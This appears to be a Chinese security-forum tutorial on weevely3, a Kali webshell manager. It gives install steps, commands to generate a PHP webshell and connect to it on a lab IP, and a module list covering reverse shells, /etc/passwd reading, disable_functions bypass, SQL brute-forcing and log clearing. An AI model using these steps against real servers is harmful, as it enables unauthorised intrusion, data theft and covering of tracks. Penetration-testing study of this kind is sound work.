安全矩阵

 找回密码
 立即注册
搜索
查看: 1986|回复: 0

2021Kali系列 -- linux菜刀(weevely3)

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-20 21:25:33 | 显示全部楼层 |阅读模式
原文链接:2021Kali系列 -- linux菜刀(weevely3)

人这辈子总是再等,等以后,等下次,等不忙,等有条件,等有时间,等有钱了,可是,后来呢。。。

----  网易云热评
简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。


一、下载地址(软件作者)
https://github.com/epinna/weevely3

二、安装使用
1、下载到本地

git clone https://github.com/epinna/weevely3.git
2、进入到weebely3目录

cd weebely3
3、安装需要的模块

pip3 install -r requirements.txt
4、启动weevely.py

./weevely.py

5、生成木马文件,在weebely3文件夹中会生成一个连接密码为123的shell.php

./weevely.py generate 123 shell.php


6、上传shell文件到目标服务器
7、连接木马

./weevely.py http://192.168.139.129:81/shell.php 123

8、获取文件目录,dir

9、利用模块收集信息

WIN-5FMG87H62FN:C:\phpstudy_pro\WWW $ :system_info -info uname

10、直接输入help,查看其它可利用模块

  1. :shell_su                     通过更变使用者来执行shell命令,可以获得root权限来执行命令.                                            
  2. :shell_sh                     执行 shell 命令.                                             
  3. :shell_php                    执行 PHP 命令.                                                
  4. :system_extensions            收集PHP和webserver扩展列表                           
  5. :system_info                  收集系统信息                                          
  6. :system_procs                 列出正在运行的进程                                             
  7. :audit_disablefunctionbypass  使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本,并在远程服务器上运行伪系统shell     
  8. :audit_etcpasswd              查看/etc/passwd文件                           
  9. :audit_suidsgid               查找带有SUID或SGID标志的文件。
  10. :audit_phpconf                查看php配置信息                                             
  11. :audit_filesystem             审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等                        
  12. :backdoor_reversetcp          执行反向TCP shell. 需要nc -lvp <port>监听                                       
  13. :backdoor_tcp                 在TCP端口上生成shell                                         
  14. :net_scan                     TCP端口扫描.                                                      
  15. :net_mail                     发送邮件.                                                           
  16. :net_ifconfig                 获取网络接口地址.                                    
  17. :net_curl                     执行类似curl的HTTP请求.                                    
  18. :net_proxy                    运行本地代理以通过目标转移HTTP / HTTPS浏览
  19. :net_phpproxy                 在目标上安装PHP代理.                                    
  20. :bruteforce_sql               可用来猜解数据库密码.                                             
  21. :file_find                    查找具有给定名称和属性的文件.                          
  22. :file_download                从远程文件系统下载文件.                                
  23. :file_check                   获取文件的属性和权限.                           
  24. :file_touch                   更改文件时间戳.                                               
  25. :file_cd                      更改当前工作目录.                                    
  26. :file_grep                    打印与多个文件中的模式匹配的行.                    
  27. :file_gzip                    压缩或解压gzip文件.                                       
  28. :file_tar                     压缩或解压tar文件.                                    
  29. :file_enum                    检查路径列表的存在和权限
  30. :file_bzip2                   压缩或解压bzip2文件.                                      
  31. :file_mount                   使用HTTPfs挂载远程文件系统.                                
  32. :file_clearlog                从文件中删除字符串.                                          
  33. :file_zip                     压缩或解压zip文件.                                       
  34. :file_cp                      复制单个文件.                                                   
  35. :file_upload2web              自动将文件上传到Web文件夹并获取相应的URL.
  36. :file_edit                    在本地编辑器上编辑远程文件.                                 
  37. :file_read                    从远程文件系统中读取远程文件.                        
  38. :file_webdownload             指定URL下载文件.                                                     
  39. :file_upload                  文件上载到远程文件系统.                                    
  40. :file_ls                      列出目录内容.                                             
  41. :file_rm                      删除远程文件.                                                  
  42. :sql_dump                     Multi dbms mysqldump replacement.                                    
  43. :sql_console                  执行SQL查询或运行sql控制台.
复制代码




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 03:41 , Processed in 0.014156 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表